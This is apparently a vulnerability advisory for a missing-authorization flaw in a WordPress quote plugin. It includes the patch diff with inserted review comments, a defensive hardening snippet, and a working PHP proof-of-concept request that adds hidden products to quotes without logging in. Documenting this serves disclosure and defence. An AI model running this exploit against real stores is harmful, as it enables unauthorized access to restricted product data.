Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24366: YITH WooCommerce Request A Quote <= 2.46.0 – Missing Authorization (yith-woocommerce-request-a-quote)

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 2.46.0
Patched Version: 2.46.1
Disclosed: January 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24366:
This vulnerability is a missing authorization flaw in the YITH WooCommerce Request A Quote plugin for WordPress, affecting versions up to and including 2.46.0. The vulnerability allows unauthenticated attackers to add non-public products to a quote request, bypassing intended visibility restrictions. The CVSS score of 5.3 reflects a medium-severity impact.

Root Cause:
The vulnerability exists in the `ajax_add_item` function within `/yith-woocommerce-request-a-quote/includes/class.yith-request-quote.php`. Before the patch, the function validated only the basic product ID and variation ID parameters (lines 431-432) and performed no check on who was making the request. The validation logic at line 434 simply set the result to `$is_valid_variation`, ignoring both the user’s authentication state and the product’s visibility status. Because the handler is registered on both the `wp_ajax_nopriv_yith_ywraq_action` and `wp_ajax_yith_ywraq_action` hooks, unauthenticated users could reach it directly.

Exploitation:
Attackers exploit this vulnerability by sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `yith_ywraq_action`. The request must include `product_id` and `add_item` parameters. The `product_id` parameter targets products with restricted visibility (products not publicly viewable). The payload structure is: `action=yith_ywraq_action&add_item=1&product_id=[TARGET_PRODUCT_ID]`. No authentication cookies or nonces are required due to the missing capability check.

Patch Analysis:
The patch adds an `add_item_is_valid` method (lines 475-487) and hooks it via the `ywraq_ajax_add_item_is_valid` filter (line 77). The new method checks if the current user is unauthenticated (`get_current_user_id() === 0`) and if so, validates that the product is both a valid `WC_Product` object and publicly visible via `$product->is_visible()`. The validation logic in `ajax_add_item` was modified to use this filter at line 444, replacing the simple `$is_valid_variation` check. The plugin version was incremented to 2.46.1 in the main plugin file.
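Site-level hardening in the same spirit as the patch, added here as an example (it is not code from the YITH plugin or from this advisory). It assumes the plugin reads `add_item` and `product_id` from `$_REQUEST`; the hook and filter names are the ones shown in the diff. Layer 1 extends the patched filter's guest-only check to every user without product-management rights; layer 2 refuses the request before the plugin's handler runs, so it also protects 2.46.0 while an upgrade is pending.

```php
<?php
/**
 * Plugin Name: YWRAQ visibility guard (added example, not YITH code)
 *
 * Drop into wp-content/mu-plugins/. Two layers:
 *  1. On the patched plugin's own filter (2.46.1+), extend the visibility
 *     check from guests to every user without product-management rights.
 *  2. On the AJAX hooks themselves, refuse add_item requests for non-visible
 *     products before the plugin's handler runs; this also covers 2.46.0,
 *     where the filter does not exist yet.
 * Assumption: the plugin reads the request from $_REQUEST with the disclosed
 * keys (action, add_item, product_id); hook and filter names come from the
 * patch diff.
 */

// Shared decision: may the current user quote this product?
function ywraq_guard_product_is_quotable( $product_id ) {
	// Users who manage products may quote hidden ones (drafts, private SKUs).
	if ( current_user_can( 'edit_products' ) ) {
		return true;
	}
	if ( ! function_exists( 'wc_get_product' ) ) {
		return false; // WooCommerce not loaded: fail closed.
	}
	$product = wc_get_product( $product_id );
	return $product instanceof WC_Product && $product->is_visible();
}

// Layer 1: runs after the plugin's own callback (priority 10) on its filter.
add_filter( 'ywraq_ajax_add_item_is_valid', function ( $is_valid, $product_id ) {
	return $is_valid && $product_id && ywraq_guard_product_is_quotable( (int) $product_id );
}, 20, 2 );

// Layer 2: pre-empt the AJAX handler for guests and logged-in users alike.
function ywraq_guard_ajax_precheck() {
	if ( empty( $_REQUEST['add_item'] ) ) {
		return; // Only the add_item sub-action is affected.
	}
	$product_id = ( isset( $_REQUEST['product_id'] ) && is_numeric( $_REQUEST['product_id'] ) )
		? (int) $_REQUEST['product_id'] : 0;
	if ( ! $product_id || ! ywraq_guard_product_is_quotable( $product_id ) ) {
		// Leave a trace for the SOC, then refuse with a JSON error and exit.
		error_log( sprintf( 'ywraq-guard: refused add_item product=%d user=%d ip=%s',
			$product_id, get_current_user_id(), $_SERVER['REMOTE_ADDR'] ?? '-' ) );
		wp_send_json_error( array( 'message' => 'Product not available for quote.' ), 403 );
	}
}
add_action( 'wp_ajax_nopriv_yith_ywraq_action', 'ywraq_guard_ajax_precheck', 1 );
add_action( 'wp_ajax_yith_ywraq_action', 'ywraq_guard_ajax_precheck', 1 );
```

The `error_log` line gives a grep-able signal (`ywraq-guard: refused`) to alert on repeated refusals from one address, which is what product-ID enumeration looks like.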

Impact:
Successful exploitation allows unauthenticated attackers to add restricted products to quote requests. This bypasses WooCommerce’s product visibility settings, potentially exposing products intended only for logged-in users or specific user roles. Attackers could enumerate product IDs to discover hidden products, though the vulnerability does not directly expose sensitive product data beyond confirming a product’s existence. The impact is limited to information disclosure about product availability rather than full data access.

Differential between vulnerable and patched code

Code Diff
--- a/yith-woocommerce-request-a-quote/includes/class.yith-request-quote.php
+++ b/yith-woocommerce-request-a-quote/includes/class.yith-request-quote.php
@@ -13,7 +13,6 @@
 }

 if ( ! class_exists( 'YITH_Request_Quote' ) ) {
-
 	/**
 	 * Class YITH_Request_Quote
 	 */
@@ -76,6 +75,7 @@
 			/* ajax action. */
 			add_action( 'wp_ajax_yith_ywraq_action', array( $this, 'ajax' ) );
 			add_action( 'wp_ajax_nopriv_yith_ywraq_action', array( $this, 'ajax' ) );
+			add_filter( 'ywraq_ajax_add_item_is_valid', array( $this, 'add_item_is_valid' ), 10, 2 );

 			/* session settings. */
 			add_action( 'wp_loaded', array( $this, 'init' ) ); // Get raq after WP and plugins are loaded.
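Review bot: the new authorization check is wired through a filter (`add_filter( 'ywraq_ajax_add_item_is_valid', array( $this, 'add_item_is_valid' ), 10, 2 );`) next to the unchanged `wp_ajax_nopriv_yith_ywraq_action` registration, so the AJAX entry point stays reachable without a login and the check can be removed by any code calling `remove_filter` or overridden by a callback on the same filter at a later priority. That is fine as an extension point, but the security-critical part belongs unconditionally in `ajax_add_item`, with the filter offered only to tighten it further; a docblock on the filter saying it must not be used to loosen the check would help.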
@@ -432,7 +432,17 @@
 			$product_id         = ( isset( $posted['product_id'] ) && is_numeric( $posted['product_id'] ) ) ? (int) $posted['product_id'] : false;
 			$is_valid_variation = isset( $posted['variation_id'] ) ? ! ( ( empty( $posted['variation_id'] ) || ! is_numeric( $posted['variation_id'] ) ) ) : true;

-			$is_valid = $is_valid_variation;
+			/**
+			 * APPLY_FILTERS: ywraq_ajax_add_item_is_valid
+			 *
+			 * Filter if the item to add is valid.
+			 *
+			 * @param boolean $is_valid   Check if the item to add is valid.
+			 * @param int     $product_id Product id.
+			 *
+			 * @return boolean
+			 */
+			$is_valid = apply_filters( 'ywraq_ajax_add_item_is_valid', $product_id && $is_valid_variation, $product_id );

 			if ( ! $is_valid ) {
 				$errors[] = __( 'Error occurred while adding product to Request a Quote list.', 'yith-woocommerce-request-a-quote' );
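Review bot: the call `$is_valid = apply_filters( 'ywraq_ajax_add_item_is_valid', $product_id && $is_valid_variation, $product_id );` passes only `$product_id`, so filter callbacks cannot see `variation_id` and the visibility decision is made on the parent product alone; consider passing `$posted` (or the variation id) as a further argument so a callback can check the variation that will actually be quoted. Also note a silent behaviour change: `$is_valid` now requires a numeric `product_id` as well, which the old `$is_valid = $is_valid_variation;` did not, and that deserves a changelog line.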
@@ -459,6 +469,23 @@
 		}

 		/**
+		 * Prevent non-authenticated users from adding non-visible products to quote
+		 *
+		 * @param bool $is_valid Product is valid for quote.
+		 * @param int  $product_id The product ID.
+		 * @return bool
+		 */
+		public function add_item_is_valid( $is_valid, $product_id ) {
+			if ( $is_valid && $product_id ) {
+				if ( get_current_user_id() === 0 ) {
+					$product  = wc_get_product( $product_id );
+					$is_valid = $product instanceof WC_Product && $product->is_visible();
+				}
+			}
+			return $is_valid;
+		}
+
+		/**
 		 * Remove an item from the list in ajax mode
 		 *
 		 * @param array $posted Request value list.
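Review bot: `add_item_is_valid` only applies the `is_visible()` check when `get_current_user_id() === 0`, so any logged-in account, including a subscriber created through open registration, can still add non-visible products. Unless hidden products are meant to be quotable by every logged-in role, check visibility for all users and exempt only those with a product-management capability (for example `current_user_can( 'edit_products' )`). The docblock should also say that this is a filter callback and that returning `false` surfaces the generic error message in `ajax_add_item`, so it is clear how a rejection reaches the client.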
--- a/yith-woocommerce-request-a-quote/yith-woocommerce-request-a-quote.php
+++ b/yith-woocommerce-request-a-quote/yith-woocommerce-request-a-quote.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: YITH Request a Quote for WooCommerce
  * Plugin URI: https://yithemes.com/themes/plugins/yith-woocommerce-request-a-quote
- * Version: 2.46.0
+ * Version: 2.46.1
  * Author: YITH
  * Author URI: https://yithemes.com/
  * Description: <code><strong>YITH Request a Quote for WooCommerce</strong></code> lets your customers ask for an estimate of a list of products they are interested in. It allows hiding prices and/or the "Add to cart" button so that your customers can request a quote on every product page. <a href="https://yithemes.com/" target="_blank">Get more plugins for your e-commerce shop on <strong>YITH</strong></a>.
@@ -75,7 +75,7 @@
 if ( defined( 'YITH_YWRAQ_VERSION' ) ) {
 	return;
 } else {
-	define( 'YITH_YWRAQ_VERSION', '2.46.0' );
+	define( 'YITH_YWRAQ_VERSION', '2.46.1' );
 }

 if ( ! defined( 'YITH_YWRAQ_FREE_INIT' ) ) {

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24366 - YITH WooCommerce Request A Quote <= 2.46.0 - Missing Authorization

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$product_id = 123; // Replace with target product ID

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'yith_ywraq_action',
    'add_item' => 1,
    'product_id' => $product_id
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Include the response headers in $response so the string checks below see both headers and body
curl_setopt($ch, CURLOPT_HEADER, true);

// No authentication cookies needed
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 200) {
    // Check for success indicators in response
    if (strpos($response, 'success') !== false || strpos($response, 'added') !== false) {
        echo "[+] Product $product_id successfully added to quote (VULNERABLE)\n";
    } else {
        echo "[-] Request succeeded but product may not have been added\n";
    }
} else {
    echo "[-] HTTP $http_code received (may be patched)\n";
}

curl_close($ch);
?>
